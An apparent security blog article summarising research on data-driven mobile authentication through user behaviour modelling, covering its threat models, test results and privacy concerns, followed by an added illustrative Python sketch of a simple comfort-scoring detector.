Figure 1 – Summary of the GCU, Rice and MIT datasets used in the tests

The researchers examined different attack scenarios based on the attacker’s level of access to a user’s frequent locations and his knowledge about the victim’s habits. The experts defined two adversarial levels, the uninformed adversary, who knows very little about the victim and his behavior, and an informed adversary that has a deep knowledge of a target user and his behavior. Additionally, the researchers defined an outsider to be a person who steals the mobile and runs away, while an insider has access to a location that the user frequently visits and attempts to use the mobile device at the same places as the legitimate users.

The results are very interesting. The informed attacks produce higher comfort levels compared to uninformed attacks. Anyway, they are not able to bypass the detection mechanism developed by the researchers.

Figure 2 – Test Results

The researchers announced that they will continue the investigations on the use of behaviour modelling, in particular analyzing different supervised learning techniques for profiling.

Is the User Behavior Modelling an efficient theft deterrent?

Although the results of the tests conducted by the experts demonstrate that the technique could be very effective against the theft of mobile devices, there are serious considerations to make about the users’ privacy. This kind of algorithm processes an impressive amount of data to profile users and to define a pattern for its analysis. Anyway, it is easy to predict that privacy advocates could criticize the technique due to possible use for surveillance purposes. The data-tracking and user profiling through the definition of contextual anchors is very invasive.
For this reason, it is crucial to understand how to implement the technique in a real commercial scenario. Principal providers of mobile OS and hardware vendors like Google and Apple are very interested in implementation of the technique in their operating systems. The researchers explained that their “User Behavior Modelling” algorithm could be very effective for payment systems like Apple Pay, and could allow securing a user’s daily purchases without constantly typing in secret passcodes.

The future applications of User Behavioral Modelling techniques depend on the capability of coders to implement models without user data ever leaving the device. The work we have analyzed proposed a lightweight, non-parametric modelling approach that can be implemented on modern mobile devices and determine when to stop the learning mode and the threshold for detection, both automatically from the data.

References

[1410.7743] Data Driven Authentication: On the Effectiveness of User Behaviour Modelling with Mobile Device Sensors

Spying Software Spots Phone Theft In 2 Minutes, No Password Needed | Co.Design | business + design

http://arxiv.org/ftp/arxiv/papers/1410/1410.7743.pdf

Source
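As an added illustration of the training-to-deployment switch and the data-derived threshold the article describes (my own simplified code, not the Glasgow Caledonian team's implementation): a toy non-parametric profile counts how often each feature (Wi-Fi network, cell tower, app, light level, Bluetooth peer) is seen per time-of-day anchor, scores a new snapshot by its familiarity, and triggers an explicit authentication challenge when the score drops below a threshold derived from the owner's own recent scores. The feature names, the hour buckets, the "no new features for N snapshots" stability rule and the halved-minimum threshold are all constructed assumptions.

```python
from collections import Counter, defaultdict

# Added example, not the paper's code: toy non-parametric comfort model; feature strings and anchors are constructed.
def anchor_of(hour):  # hypothetical hour-of-day buckets standing in for the paper's contextual anchors
    return "morning" if 6 <= hour < 12 else "day" if hour < 18 else "evening"

class BehaviourProfile:
    def __init__(self, stable_rounds=3):
        self.counts = defaultdict(Counter)  # anchor -> feature -> times observed
        self.seen = defaultdict(int)        # anchor -> snapshots observed
        self.scores = []                    # comfort of each training snapshot
        self.stable_rounds = stable_rounds  # novelty-free snapshots required before deploying
        self._unchanged = 0
        self.deployed = False
        self.threshold = None

    def comfort(self, hour, features):
        """Mean per-feature familiarity in this anchor: 1.0 = always seen, 0.0 = never seen."""
        a = anchor_of(hour)
        n = self.seen[a]
        if n == 0 or not features:
            return 0.0  # an anchor with no history gives no comfort at all
        return sum(self.counts[a][f] / n for f in features) / len(features)

    def observe(self, hour, features):
        """Feed one sensor snapshot; returns 'training', 'ok' or 'challenge'."""
        score = self.comfort(hour, features)
        if self.deployed:
            return "ok" if score >= self.threshold else "challenge"
        a = anchor_of(hour)
        novel = any(self.counts[a][f] == 0 for f in features)
        self.counts[a].update(features)
        self.seen[a] += 1
        self.scores.append(score)
        self._unchanged = 0 if novel else self._unchanged + 1
        if self._unchanged >= self.stable_rounds:
            # Profile stopped learning new features: deploy, threshold from the owner's own recent scores.
            self.deployed = True
            self.threshold = 0.5 * min(self.scores[-self.stable_rounds:])
        return "training"

# Constructed snapshots: an owner's mornings at home, then an outsider and an informed insider.
BASE = {"wifi:HomeNet", "cell:101", "light:low", "bt:watch"}
TRAINING = [(8, BASE | {"app:mail"}), (8, BASE | {"app:news"}), (9, BASE | {"app:mail"}),
            (8, BASE | {"app:news"}), (9, BASE | {"app:mail"})]
OUTSIDER = {"wifi:CafeFree", "cell:555", "light:high", "bt:none", "app:bank"}  # took the phone elsewhere
INSIDER = {"wifi:HomeNet", "cell:101", "light:high", "bt:earbuds", "app:bank"}  # same flat, own habits

def run_demo():
    """Train on the owner's snapshots, then score both adversaries; returns (profile, decisions)."""
    profile = BehaviourProfile(stable_rounds=3)
    for hour, feats in TRAINING:
        profile.observe(hour, feats)
    return profile, [profile.observe(8, OUTSIDER), profile.observe(8, INSIDER)]
```

The insider scores higher comfort than the outsider (shared Wi-Fi and cell tower) yet still lands under the threshold, mirroring the article's observation that informed attacks raise comfort without defeating detection; a snapshot in an anchor with no training history scores zero, so a real deployment would need per-anchor training rather than this single global stability counter.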